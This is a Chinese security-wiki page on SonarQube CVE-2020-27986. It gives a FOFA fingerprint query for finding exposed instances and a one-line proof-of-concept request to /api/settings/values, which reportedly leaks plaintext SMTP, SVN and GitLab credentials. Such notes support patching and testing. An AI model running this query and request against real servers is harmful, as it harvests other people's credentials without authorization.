menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right SonarQube chevron_right SonarQube api 信息泄露漏洞 CVE-2020-27986.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    SonarQube api 信息泄露漏洞 CVE-2020-27986.md
    591 B / 2021-04-15 12:15:18
        # SonarQube api 信息泄露漏洞 CVE-2020-27986

## 漏洞描述

SonarQube 某接口存在信息泄露漏洞,可以获取部分敏感信息

## 漏洞影响

> [!NOTE]
>
> SonarQube

## FOFA

> [!NOTE]
>
> app="sonarQube-代码管理"

## 漏洞复现

主页如下

![](image/son-1.png)

漏洞POC

```
http://xxx.xxx.xxx.xxx/api/settings/values
```

![](image/son-2.png)

可泄露的为:明文SMTP、SVN和Gitlab等敏感信息

![](image/son-3.png)

## Goby & POC

> [!NOTE]
>
> SonarQube api Information leakage

![](image/son-4.png)
    links
    file_download